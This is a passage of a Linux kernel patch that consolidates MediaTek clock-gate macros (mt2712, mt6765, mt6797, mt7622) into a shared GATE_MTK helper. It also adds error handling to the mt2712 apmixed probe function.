+ 
+ static const struct mtk_gate jpgdec_clks[] = {
+ 	GATE_JPGDEC(CLK_JPGDEC_JPGDEC1, "jpgdec_jpgdec1", "jpgdec_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-mfg.c b/drivers/clk/mediatek/clk-mt2712-mfg.c
+index 42f8cf3ecf4cb..8949315c2dd20 100644
+--- a/drivers/clk/mediatek/clk-mt2712-mfg.c
++++ b/drivers/clk/mediatek/clk-mt2712-mfg.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mfg_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_MFG(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mfg_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MFG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mfg_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mfg_clks[] = {
+ 	GATE_MFG(CLK_MFG_BG3D, "mfg_bg3d", "mfg_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712-mm.c b/drivers/clk/mediatek/clk-mt2712-mm.c
+index 7d44b09b8a0a7..ad6daa8f28a83 100644
+--- a/drivers/clk/mediatek/clk-mt2712-mm.c
++++ b/drivers/clk/mediatek/clk-mt2712-mm.c
+@@ -30,32 +30,14 @@ static const struct mtk_gate_regs mm2_cg_regs = {
+ 	.sta_ofs = 0x220,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM2(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt2712-vdec.c b/drivers/clk/mediatek/clk-mt2712-vdec.c
+index 6296ed5c5b555..572290dd43c87 100644
+--- a/drivers/clk/mediatek/clk-mt2712-vdec.c
++++ b/drivers/clk/mediatek/clk-mt2712-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x8,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	/* VDEC0 */
+diff --git a/drivers/clk/mediatek/clk-mt2712-venc.c b/drivers/clk/mediatek/clk-mt2712-venc.c
+index b9bfc35de629c..9588eb03016eb 100644
+--- a/drivers/clk/mediatek/clk-mt2712-venc.c
++++ b/drivers/clk/mediatek/clk-mt2712-venc.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_SMI_COMMON_CON, "venc_smi", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt2712.c b/drivers/clk/mediatek/clk-mt2712.c
+index 56980dd6c2eaf..d6c2cc183b1a1 100644
+--- a/drivers/clk/mediatek/clk-mt2712.c
++++ b/drivers/clk/mediatek/clk-mt2712.c
+@@ -958,23 +958,11 @@ static const struct mtk_gate_regs top1_cg_regs = {
+ 	.sta_ofs = 0x424,
+ };
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	/* TOP0 */
+@@ -998,14 +986,8 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x48,
+ };
+ 
+-#define GATE_INFRA(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &infra_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_INFRA(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate infra_clks[] = {
+ 	GATE_INFRA(CLK_INFRA_DBGCLK, "infra_dbgclk", "axi_sel", 0),
+@@ -1035,32 +1017,14 @@ static const struct mtk_gate_regs peri2_cg_regs = {
+ 	.sta_ofs = 0x42c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &peri2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_PERI2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &peri2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate peri_clks[] = {
+ 	/* PERI0 */
+@@ -1283,15 +1247,25 @@ static int clk_mt2712_apmixed_probe(struct platform_device *pdev)
+ 	struct device_node *node = pdev->dev.of_node;
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_APMIXED_NR_CLK);
++	if (!clk_data)
++		return -ENOMEM;
+ 
+-	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
++	r = mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
++	if (r)
++		goto free_clk_data;
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
++	if (r) {
++		dev_err(&pdev->dev, "Cannot register clock provider: %d\n", r);
++		goto unregister_plls;
++	}
+ 
+-	if (r != 0)
+-		pr_err("%s(): could not register clock provider: %d\n",
+-			__func__, r);
++	return 0;
+ 
++unregister_plls:
++	mtk_clk_unregister_plls(plls, ARRAY_SIZE(plls), clk_data);
++free_clk_data:
++	mtk_free_clk_data(clk_data);
+ 	return r;
+ }
+ 
+diff --git a/drivers/clk/mediatek/clk-mt6765-audio.c b/drivers/clk/mediatek/clk-mt6765-audio.c
+index 0aa6c0d352ca5..5682e0302eee2 100644
+--- a/drivers/clk/mediatek/clk-mt6765-audio.c
++++ b/drivers/clk/mediatek/clk-mt6765-audio.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs audio1_cg_regs = {
+ 	.sta_ofs = 0x4,
+ };
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO1(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate audio_clks[] = {
+ 	/* AUDIO0 */
+diff --git a/drivers/clk/mediatek/clk-mt6765-cam.c b/drivers/clk/mediatek/clk-mt6765-cam.c
+index 25f2bef38126e..6e7d192c19cb0 100644
+--- a/drivers/clk/mediatek/clk-mt6765-cam.c
++++ b/drivers/clk/mediatek/clk-mt6765-cam.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs cam_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_CAM(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &cam_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_CAM(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &cam_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate cam_clks[] = {
+ 	GATE_CAM(CLK_CAM_LARB3, "cam_larb3", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765-img.c b/drivers/clk/mediatek/clk-mt6765-img.c
+index a62303ef4f41d..cfbc907988aff 100644
+--- a/drivers/clk/mediatek/clk-mt6765-img.c
++++ b/drivers/clk/mediatek/clk-mt6765-img.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_LARB2, "img_larb2", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765-mipi0a.c b/drivers/clk/mediatek/clk-mt6765-mipi0a.c
+index 25c829fc38661..f2b9dc8084801 100644
+--- a/drivers/clk/mediatek/clk-mt6765-mipi0a.c
++++ b/drivers/clk/mediatek/clk-mt6765-mipi0a.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mipi0a_cg_regs = {
+ 	.sta_ofs = 0x80,
+ };
+ 
+-#define GATE_MIPI0A(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mipi0a_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_MIPI0A(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mipi0a_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate mipi0a_clks[] = {
+ 	GATE_MIPI0A(CLK_MIPI0A_CSR_CSI_EN_0A,
+diff --git a/drivers/clk/mediatek/clk-mt6765-mm.c b/drivers/clk/mediatek/clk-mt6765-mm.c
+index bda774668a361..a4570c9dbefa5 100644
+--- a/drivers/clk/mediatek/clk-mt6765-mm.c
++++ b/drivers/clk/mediatek/clk-mt6765-mm.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs mm_cg_regs = {
+ 	.sta_ofs = 0x100,
+ };
+ 
+-#define GATE_MM(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM */
+diff --git a/drivers/clk/mediatek/clk-mt6765-vcodec.c b/drivers/clk/mediatek/clk-mt6765-vcodec.c
+index 2bc1fbde87da9..75d72b9b4032c 100644
+--- a/drivers/clk/mediatek/clk-mt6765-vcodec.c
++++ b/drivers/clk/mediatek/clk-mt6765-vcodec.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_SET0_LARB, "venc_set0_larb", "mm_ck", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6765.c b/drivers/clk/mediatek/clk-mt6765.c
+index e9b9e67297335..665981fc411f5 100644
+--- a/drivers/clk/mediatek/clk-mt6765.c
++++ b/drivers/clk/mediatek/clk-mt6765.c
+@@ -483,32 +483,14 @@ static const struct mtk_gate_regs top2_cg_regs = {
+ 	.sta_ofs = 0x320,
+ };
+ 
+-#define GATE_TOP0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+-#define GATE_TOP2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate top_clks[] = {
+ 	/* TOP0 */
+@@ -559,41 +541,17 @@ static const struct mtk_gate_regs ifr5_cg_regs = {
+ 	.sta_ofs = 0xc8,
+ };
+ 
+-#define GATE_IFR2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR3(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr3_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR4(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr4_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR4(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr4_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_IFR5(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &ifr5_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IFR5(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &ifr5_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate ifr_clks[] = {
+ 	/* INFRA_TOPAXI */
+@@ -674,14 +632,8 @@ static const struct mtk_gate_regs apmixed_cg_regs = {
+ 	.sta_ofs = 0x14,
+ };
+ 
+-#define GATE_APMIXED(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &apmixed_cg_regs,		\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr_inv,		\
+-	}
++#define GATE_APMIXED(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &apmixed_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr_inv)
+ 
+ static const struct mtk_gate apmixed_clks[] = {
+ 	/* AUDIO0 */
+diff --git a/drivers/clk/mediatek/clk-mt6797-img.c b/drivers/clk/mediatek/clk-mt6797-img.c
+index 7c6a53fbb8be6..06441393478f6 100644
+--- a/drivers/clk/mediatek/clk-mt6797-img.c
++++ b/drivers/clk/mediatek/clk-mt6797-img.c
+@@ -16,14 +16,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] = {
+ 	GATE_IMG(CLK_IMG_FDVT, "img_fdvt", "mm_sel", 11),
+diff --git a/drivers/clk/mediatek/clk-mt6797-mm.c b/drivers/clk/mediatek/clk-mt6797-mm.c
+index 0846011fc8943..99a63f46642fa 100644
+--- a/drivers/clk/mediatek/clk-mt6797-mm.c
++++ b/drivers/clk/mediatek/clk-mt6797-mm.c
+@@ -23,23 +23,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {			\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &mm0_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr,		\
+-}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_MM1(_id, _name, _parent, _shift) {			\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &mm1_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr,		\
+-}
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	GATE_MM0(CLK_MM_SMI_COMMON, "mm_smi_common", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6797-vdec.c b/drivers/clk/mediatek/clk-mt6797-vdec.c
+index 6120fccc859f1..8622ddd87a5bb 100644
+--- a/drivers/clk/mediatek/clk-mt6797-vdec.c
++++ b/drivers/clk/mediatek/clk-mt6797-vdec.c
+@@ -24,23 +24,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x0008,
+ };
+ 
+-#define GATE_VDEC0(_id, _name, _parent, _shift) {		\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &vdec0_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr_inv,		\
+-}
++#define GATE_VDEC0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1(_id, _name, _parent, _shift) {		\
+-	.id = _id,					\
+-	.name = _name,					\
+-	.parent_name = _parent,				\
+-	.regs = &vdec1_cg_regs,				\
+-	.shift = _shift,				\
+-	.ops = &mtk_clk_gate_ops_setclr_inv,		\
+-}
++#define GATE_VDEC1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] = {
+ 	GATE_VDEC0(CLK_VDEC_CKEN_ENG, "vdec_cken_eng", "vdec_sel", 8),
+diff --git a/drivers/clk/mediatek/clk-mt6797-venc.c b/drivers/clk/mediatek/clk-mt6797-venc.c
+index 834d3834d2bbc..928d611a476e4 100644
+--- a/drivers/clk/mediatek/clk-mt6797-venc.c
++++ b/drivers/clk/mediatek/clk-mt6797-venc.c
+@@ -18,14 +18,8 @@ static const struct mtk_gate_regs venc_cg_regs = {
+ 	.sta_ofs = 0x0000,
+ };
+ 
+-#define GATE_VENC(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &venc_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VENC(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &venc_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate venc_clks[] = {
+ 	GATE_VENC(CLK_VENC_0, "venc_0", "mm_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt6797.c b/drivers/clk/mediatek/clk-mt6797.c
+index b89f325a4b9b8..78339cb35beb0 100644
+--- a/drivers/clk/mediatek/clk-mt6797.c
++++ b/drivers/clk/mediatek/clk-mt6797.c
+@@ -420,40 +420,22 @@ static const struct mtk_gate_regs infra2_cg_regs = {
+ 	.sta_ofs = 0x00b0,
+ };
+ 
+-#define GATE_ICG0(_id, _name, _parent, _shift) {		\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra0_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-}
++#define GATE_ICG0(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG1(_id, _name, _parent, _shift)			\
+-	GATE_ICG1_FLAGS(_id, _name, _parent, _shift, 0)
++#define GATE_ICG1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG1_FLAGS(_id, _name, _parent, _shift, _flags) {	\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra1_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-	.flags = _flags,					\
+-}
++#define GATE_ICG1_FLAGS(_id, _name, _parent, _shift, _flags)		\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra1_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, _flags)
+ 
+-#define GATE_ICG2(_id, _name, _parent, _shift)			\
+-	GATE_ICG2_FLAGS(_id, _name, _parent, _shift, 0)
++#define GATE_ICG2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &infra2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_ICG2_FLAGS(_id, _name, _parent, _shift, _flags) {	\
+-	.id = _id,						\
+-	.name = _name,						\
+-	.parent_name = _parent,					\
+-	.regs = &infra2_cg_regs,				\
+-	.shift = _shift,					\
+-	.ops = &mtk_clk_gate_ops_setclr,			\
+-	.flags = _flags,					\
+-}
++#define GATE_ICG2_FLAGS(_id, _name, _parent, _shift, _flags)		\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra2_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, _flags)
+ 
+ /*
+  * Clock gates dramc and dramc_b are needed by the DRAM controller.
+diff --git a/drivers/clk/mediatek/clk-mt7622-aud.c b/drivers/clk/mediatek/clk-mt7622-aud.c
+index 9f2e5aa7b5d9b..b17731fa11445 100644
+--- a/drivers/clk/mediatek/clk-mt7622-aud.c
++++ b/drivers/clk/mediatek/clk-mt7622-aud.c
+@@ -16,41 +16,17 @@
+ 
+ #include <dt-bindings/clock/mt7622-clk.h>
+ 
+-#define GATE_AUDIO0(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_AUDIO0(_id, _name, _parent, _shift)		\
++	GATE_MTK(_id, _name, _parent, &audio0_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+-#define GATE_AUDIO1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &audio1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
